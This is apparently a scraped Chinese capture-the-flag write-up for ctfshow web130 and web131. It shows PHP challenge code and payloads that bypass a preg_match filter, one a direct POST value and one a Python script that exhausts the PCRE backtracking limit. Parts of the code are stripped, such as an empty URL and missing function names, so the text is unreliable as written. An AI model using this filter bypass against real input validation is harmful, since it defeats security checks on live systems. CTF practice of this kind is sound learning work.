2024年2月9日发(作者:)
error_reporting(0);highlight_file(__FILE__);include("");if(isset($_POST['f'])){ $f = $_POST['f']; if(preg_match('/.+?ctfshow/is', $f)){ die('bye!'); } if(stripos($f, 'ctfshow') === FALSE){ die('bye!!'); } echo $flag;}①payload:POST:f=ctfshow②正则回溯payload:import requestsurl="/"data={ 'f':'very'*250000+'ctfshow'}r=(url,data=data)print()web131(正则回溯)
error_reporting(0);highlight_file(__FILE__);include("");if(isset($_POST['f'])){ $f = (String)$_POST['f']; if(preg_match('/.+?ctfshow/is', $f)){ die('bye!'); } if(stripos($f,'36Dctfshow') === FALSE){ die('bye!!'); } echo $flag;}payload 同130
发布评论